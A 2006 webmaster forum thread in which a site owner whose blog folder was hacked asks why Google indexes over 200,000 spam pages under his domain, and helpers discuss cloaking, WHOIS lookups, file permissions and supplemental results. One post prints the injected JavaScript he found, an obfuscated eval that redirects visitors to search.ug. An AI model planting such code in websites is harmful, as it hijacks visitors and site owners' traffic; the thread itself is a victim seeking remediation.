View Full Version : Google Search Results: Thousands Of Pages I Never Made + search.ug
I am posting here because I do not know how to fix the problem I am having with my website: Frenchtowner.com (http://www.frenchtowner.com/).
Doing a site search on my website, Google is showing that I have 216,000 pages indexed. That would be fabulous if I actually had that many pages, but I only have about 334. These 215,666 fake spam pages are about subjects I never write about or even care about.
I am not alone in this situation, in my limited research, I have found many other sites with this same problem. Many of these sites are non-profit foundation websites, and even one municipal website.
I have gone through all of my directories of the site and deleted all the suspect files that I can find, and changed permissions on directories also. Earlier this week, there were only a few thousand fake pages, and now they are multiplying like rats.
I do not want this problem to affect my google ranking, but I do not know what to do. I would appreciate any help that any one can offer. It would also be great to know how this happens technically.
I should note that this spam attack sometimes redirects to a domain: search.ug and other similar sites around the world. I fixed that part of this problem some time ago, but I cannot make any headway with this last part.
One other note, these fake pages are not showing on Yahoo or MSN.
Sincerely,
JVJ
JohnW
08-26-2006, 08:13 PM
>I do not want this problem to affect my google ranking
Unfortunately it probably will. From the limited information, it could be a cloaking job done on Googles IP address range. Either your hosting company is playing games or has been compromised, or someone has gained access to your site, in order to set up something like that, if that's what going on. Post the url if you want to.
John,
Thanks for responding. I know that someone gained access to my site. They uploaded .htaccess files and others that I removed. These were the ones doing the redirects. Honestly I did that months ago and I thought the problem was fixed. This week I just did a check and found that the situation had gotten worse. That is when I changed permissions on the files. A few days later Google showed that I had even more spam junk pages.
In trying to fix this, I even wrote the owner of the search.ug site. He suggested that I had been compromised, but he did not admit (surprise-surprise) that he had hacked my site. It does not make sense to me however that someone would go to all this trouble to hack thousands of sites to send traffic to a website that they were not associated with.
I can supply a list of sites that have been compromised, but I do not want to hurt any of these websites by listing them here, especially since some are for non-profits.
JohnW
08-26-2006, 10:01 PM
Have you thought about using the Google url removal tool? It might not be too late.
Chris Boggs
08-26-2006, 10:33 PM
yeah agreed with John...sign up for G webmaster tools (https://www.google.com/webmasters/sitemaps/docs/en/about.html) immediately, and if you do notice trouble you should be able to submit a reinclusion. Make sure you use "victim of cloaking/redirect," or something like that in the subject to get their attention.
Marcia
08-27-2006, 02:11 AM
JVJ, do you use a hosting company or host the site yourself? If it's a hosting company, have you notified them of this happening? It sounds like the server may have been compromised (which has been happening to others lately) and if that's so, if it's shared hosting there may be other sites experiencing the same thing and if it's a "good" host they may be able to fix any holes that may exist.
Is there any pattern to the pages added that aren't yours, and can you give an example or two of what isn't yours?
Added:
It looks like you're not alone with this:
Google search for search.ug (http://www.google.com/search?sourceid=navclient&ie=UTF-8&rls=GGLD,GGLD:2005-11,GGLD:en&q=search%2Eug)
site:search.ug (http://www.google.com/search?hl=en&lr=&safe=off&rls=GGLD%2CGGLD%3A2005-11%2CGGLD%3Aen&q=site%3Asearch.ug&btnG=Search)
Marcia
08-27-2006, 03:54 AM
And more:
The links to sites on the search pages at search.ug are being run through go.php? but using an IP number (66.230.182.46) rather than domain name. Here's what turns up at Sam Spade for that IP
Server Used: [ whois.arin.net ]
66.230.182.46 = [ ]
OrgName: ISPrime Inc.
OrgID: IPRM
Address: 25 Broadway
Address: 6th Floor Suite 2
City: New York
StateProv: NY
PostalCode: 10004-1086
Country: US
NetRange: 66.230.128.0 - 66.230.191.255
CIDR: 66.230.128.0/18
NetName: NET-66-230-128-0-1
NetHandle: NET-66-230-128-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: NS.ISPRIME.COM
NameServer: NS2.ISPRIME.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-02-15
Updated: 2004-06-04
RAbuseHandle: ISPRI1-ARIN
RAbuseName: ISPrime Abuse
RAbusePhone: 1-212-812-9028
RAbuseEmail: abuse@isprime.com
RNOCHandle: ISPRI-ARIN
RNOCName: ISPrime NOC
RNOCPhone: 1-212-812-9028
RNOCEmail: noc@isprime.com
RTechHandle: ITS7-ARIN
RTechName: ISPrime Technical Support
RTechPhone: 1-212-812-9028
RTechEmail: support@isprime.com
OrgAbuseHandle: ISPRI1-ARIN
OrgAbuseName: ISPrime Abuse
OrgAbusePhone: 1-212-812-9028
OrgAbuseEmail: abuse@isprime.com
OrgNOCHandle: ISPRI-ARIN
OrgNOCName: ISPrime NOC
OrgNOCPhone: 1-212-812-9028
OrgNOCEmail: noc@isprime.com
OrgTechHandle: ITS7-ARIN
OrgTechName: ISPrime Technical Support
OrgTechPhone: 1-212-812-9028
OrgTechEmail: support@isprime.com
ARIN WHOIS database last updated 2006-08-26 19: 10
Enter ? for additional hints on searching ARIN's WHOIS database. http://www.samspade.org/t/ipwhois?a=66.230.182.46
==================================
When pinging search.ug the IP number appears to be 88.151.113.7 - but information doesn't seem to be available through a Sam Spade search. However, typing the web address into the browser by IP, this is what we arrive at:
http://88.151.113.7/
A search by IP at www.ripe.net brings up this information about that IP (http://www.ripe.net/whois?form_type=advanced&full_query_string=&searchtext=88.151.113.7&do_search=Search&reverse_delegation_domains=ON&inverse_attributes=None&ip_search_lvl=Default%28nearest+match%29&alt_database=RIPE&object_type=All)
% Information related to '88.151.112.0 - 88.151.115.255'
inetnum: 88.151.112.0 - 88.151.115.255
netname: GOLDENNET
descr: LLC "Golden Internet"
country: RU
admin-c: GOLD4-RIPE
tech-c: GOLD4-RIPE
status: ASSIGNED PA
remarks: ************************************************** *************************
remarks: CONTACT ADDRESSES
remarks: ************************************************** *************************
remarks: General information: info@goldeninternet.ru
remarks: Abuse: abuse-general@goldeninternet.ru
remarks: Spam: abuse-mail@goldeninternet.ru
remarks: Scans/Hacking attempts: abuse-hacking@goldeninternet.ru
remarks: IP delegation: ip@goldeninternet.ru
remarks: ************************************************** *************************
remarks: Working hours: 9 am - 6 pm MSK/MSD (GMT+3/+4)
remarks: ************************************************** *************************
mnt-by: GOLDENNET-MNT
mnt-routes: ABOVENET-MNT
mnt-routes: ABOVENET-P
source: RIPE # Filtered
role: GOLDEN INTERNET
address: 4 korp. 2 Kedrova str.
address: 117292, Moscow
address: Russian Federation
abuse-mailbox: abuse-general@goldeninternet.ru
admin-c: DSS21-RIPE
tech-c: SVK58-RIPE
nic-hdl: GOLD4-RIPE
mnt-by: GOLDENNET-MNT
source: RIPE # Filtered
% Information related to '88.151.112.0/22AS6461'
route: 88.151.112.0/22
descr: GoldenInternet
origin: AS6461
mnt-by: ABOVENET-P
source: RIPE # Filtered==============
When navigating to individual pages on the site located at that IP, the links to companies on pages are being run through a jump script all using the IP in the URL rather than domain name. I think it's fairly safe to assume they're PPC links being obfuscated and tracked.
Note:
That does NOT necessarily mean that either of those two companies/entities above who the IP ranges belong to are directly involved with this or are even aware of it; my guess would be that they aren't, because there would be too much transparency. It's just a pit stop check of locations along the way related to what's happening.
=======================
Added: As a point of interest, here's info about the ug TLD:
http://en.wikipedia.org/wiki/.ug
Marcia,
First of all, thank you for your research and your suggestions. You have come up with some info. that I never found.
In response to your questions: see answers below:
"JVJ, do you use a hosting company or host the site yourself?" If it's a hosting company, have you notified them of this happening?
I use a hosting company, and I have notified them. They told me to notify Google. I did that at the beginning of this fiasco, and never got a response.
"Is there any pattern to the pages added that aren't yours, and can you give an example or two of what isn't yours?"
Yes, there is a pattern. All of the non-existent spam junk pages listed for me are in the blog folder. Here are some of the Google Search Results for pages I never made:
gold miner se warez (http://www.frenchtowner.com/blog-frenchtown-nj/archives/gold-miner-se-warez.phtml)
gold miner se warez, sound forge 7 mp3 plugin activation code, worms armageddon -forums -demo download free warez.
www.frenchtowner.com/blog-frenchtown-nj/archives/gold-miner-se-warez.phtml - 9k - Supplemental Result - Cached - Similar pages
jenifer lopes photo (http://www.frenchtowner.com/blog-frenchtown-nj/jenifer-lopes-photo.phtml)
jenifer lopes photo, manga smartphone skins, Robotics 1806 drivers xp, free antivirus programm.
www.frenchtowner.com/blog-frenchtown-nj/jenifer-lopes-photo.phtml - 10k - Supplemental Result - Cached - Similar pages
DOWNBLOUSE.IT BACKDOOR (http://www.frenchtowner.com/blog-frenchtown-nj/DOWNBLOUSE.IT-BACKDOOR.phtml)
DOWNBLOUSE.IT BACKDOOR, alien shooter dawnload, kakadu source code BT, Wet - The Sexy Empire.rar download, opera Series60 crack, free downloade, ...
www.frenchtowner.com/blog-frenchtown-nj/DOWNBLOUSE.IT-BACKDOOR.phtml - 9k - Supplemental Result - Cached - Similar pages
%3C$BlogBacklinkURL$%3E (http://www.frenchtowner.com/blog-frenchtown-nj/2005/11/%3C$BlogBacklinkURL$%3E)
%3C$BlogBacklinkURL$%3E, counter strike trainer wallhack, winavi telecharger gratuite, webcam server, protect me 4.17 serial, keylogger to counter strike ...
www.frenchtowner.com/blog-frenchtown-nj/2005/11/%3C$BlogBacklinkURL$%3E - 9k - Supplemental Result - Cached - Similar pages
"It looks like you're not alone with this:"
No, I am not alone, there are other discussions on other forums:
Pro-Networks.org (http://www.pro-networks.org/forum/viewtopic.php?t=62756&postdays=0&postorder=asc&start=0&sid=77aa4c66228e272256c770032683f7f4)
and:
Google Groups: Webmaster Help (http://groups.google.off.ai/group/Google_Webmaster_Help-Indexing/browse_thread/thread/377cf6544807efce/09e2141e285bd293?lnk=st&q=search.ug&rnum=2&hl=en#09e2141e285bd293)
The search.ug redirect seems to work with a javascript:
<script language="JavaScript">
<!--
function ames() {
if(self.parent.frames.length != 0)
self.parent.location = document.location;
}
function gotopage(adress) {
if(adress != '') { window.location.href = adress; }
}
ames();
eval('windo'+'w.loc'+'at'+'ion='+'"ht'+'tp:'+'//'+'sea'+'rch'+'.ug'+'/?'+'cT1e'+'Xl5'+'zP'+'WVeX'+'l5kPQ=="');
// -->
</script>
I found this on one of my pages before I took the initial steps to correct the problem.
Marcia
08-27-2006, 09:12 AM
The pages aren't up any more, but they're still cached, redirect and all.
"JVJ, do you use a hosting company or host the site yourself?" If it's a hosting company, have you notified them of this happening?
I use a hosting company, and I have notified them. They told me to notify Google. I did that at the beginning of this fiasco, and never got a response.That isn't correct. First off, it's not even an issue for a Google spam report, that's for sites that are spamming and you aren't.
Secondly and more important, it is definitely a hosting company's responsibility to look after security on the servers they run that folks have entrusted their sites to be hosted on. Security on their servers is not Google's job to do, it's theirs.
BTW, I looked by IP also and saw who you're hosting with and where the boxes are that they're using. If that's the response you got from contacting tech support, write again and *demand* that the case be escalated to 2nd Tier support. You might want to include links to the cache for the pages, while they're still in there.
You also might want to grab some screenshots of the pages in the cache - easily done using Opera browser, with which it's very quick and easy to disable Javascript if that's how the redirection is being done. You can also grab screenshots of the pages being redirected to.
Marcia,
I do have to take responsibility. I was the one who left my directories open with free for all chmod coding. I have now fixed that.
Maybe I am being dense, but I still do not understand how these spam pages are still listed on Google Search Results as being on my site, all leading to 404 pages, and how the number of them only increased after I fixed the permission codes. Is a 755 code not secure enough?
I think that my hosting company was saying that there was nothing that they could do to get the fake pages un-listed/de-listed on the Google Search Results.
Marcia
08-27-2006, 10:48 AM
I've read that it's up to the server admin to take security measures so that no user can over-ride the settings in the root but I'm no techie and only know what I read or ask about in a "surface" way.
I have found a page in the RedHat documentation that goes into what the different settings mean. The numerical explanations are found at the bottom of the page:
Here is a list of some common settings, numerical values and their meanings:
-rw------- (600) — Only the owner has read and write permissions.
-rw-r--r-- (644) — Only the owner has read and write permissions; the group and others have read only.
-rwx------ (700) — Only the owner has read, write, and execute permissions.
-rwxr-xr-x (755) — The owner has read, write, and execute permissions; the group and others have only read and execute.
-rwx--x--x (711) — The owner has read, write, and execute permissions; the group and others have only execute.
-rw-rw-rw- (666) — Everyone can read and write to the file. (Be careful with these permissions.)
-rwxrwxrwx (777) — Everyone can read, write, and execute. (Again, this permissions setting can be hazardous.)
Here are some common settings for directories:
drwx------ (700) — Only the user can read, write in this directory.
drwxr-xr-x (755) — Everyone can read the directory; users and groups have read and execute permissions. Ownership and Permissions (http://www.redhat.com/docs/manuals/linux/RHL-9-Manual/getting-started-guide/s1-navigating-ownership.html)
Marcia,
I did some other reading and it seems then that the 755 code should be fine.
Thanks for all of your help.
That still leaves us with the mystery of the ever increasing number of fake pages that all read as 404 error pages. I will put that in the next post, as a seperate issue.
Since this problem is showing up in Google Search Results, I am posting this as a seperate post since that is what this forum is about.
First of all, why do 404 error pages ever show up in Google Search Results?
Secondly, just how big is this problem? If my website has 215,000 of these pages listed, another website has 460,000 (http://groups.google.off.ai/group/Google_Webmaster_Help-Indexing/browse_thread/thread/377cf6544807efce/09e2141e285bd293?lnk=st&q=search.ug&rnum=2&hl=en#09e2141e285bd293), and a non-profit I have told about this problem has 263,000, and a prominent classical music non-profit site has over 1,600,000 junk pages indexed, we are talking about major compromise of the Google SERPS.
That is in simple math terms:
MY SITE: 215,000
OTHER SITE: 460,000
NON-PROFIT SITE #1: 263,000
NON-PROFIT SITE #2: 1,600,000
======================================
TOTAL FAKE SPAM PAGES: 2,538,000
This is just for 4 websites, if I more in-depth investigation was done what would the total number be, of useless, fake, junkspam pages across the entire internet? I don't think Google wants this garbage in their search results. Is this a backdoor attack on Google itself? Is someone simply trying to damage the integrity of their results, and not so much to drive traffic to their own site(s)?
I am just trying to understand this all better.
JohnW
08-27-2006, 05:19 PM
>First of all, why do 404 error pages ever show up in Google Search Results?
It was not a 404 at the time that Google crawled it and cached it. These will hang around for a long time as supplemental results if you don’t remove them from G as previously described.
John,
These have been 404 pages for a long time. The last crawl, and update of my SERPS was earlier this week, when I went from thousands of junk pages to hundreds of thousands of junk pages. That is why somehow I think that there might still be some malicious code/file on my site that I cannot find.
By the way, here is the cached text from one of these junk pages. It is very interesting the way the page is made. It seems to be constructed of modules that are simply shifted around to make copies of itself to duplicate itself over and over again.
Here's a gif of the cached page from Google:
http://www.frenchtowner.com/m/spam-page-cached.gif
JohnW
08-27-2006, 07:07 PM
>These have been 404 pages for a long time.
I looked at a few from your supplemental results. For example look at this one “free skins motorola e398” and see the cached date - Mar 24, 2006 04:51:48 GMT. This page may have been a 404 for 5 months but because it’s supplemental it won’t get crawled very often and may not get crawled again by Gbot for a long while. G won’t see the 404 until next time they try to crawl this page, it will be some time after that that the pages is removed automatically. If ever ;-)
I would just remove these pages with the tool like mentioned before and then focus on what you can do something about, which at this point is security. From what you have said you don’t seem convinced (or convincing) that you have solved the security problem.
g1smd
08-28-2006, 05:42 PM
In their supplemental update just a week or so ago, Google cleaned up all old supplemental results from before 2005 December that represented URLs long ago deleted or redirected. Those are now gone from the index.
They have updated supplemental results for duplicate content where the duplicate URL still serves the content with a "200 OK" status. The URL now has a newer cache, but still supplemental.
This is the mort important part:
They have created new supplemental results for any URL where the content has been edited, or deleted, or the URL newly redirected, in the last few months. The supplemental result represents the old content at that URL.
They will now hold that result for about one year before deleting it from the index.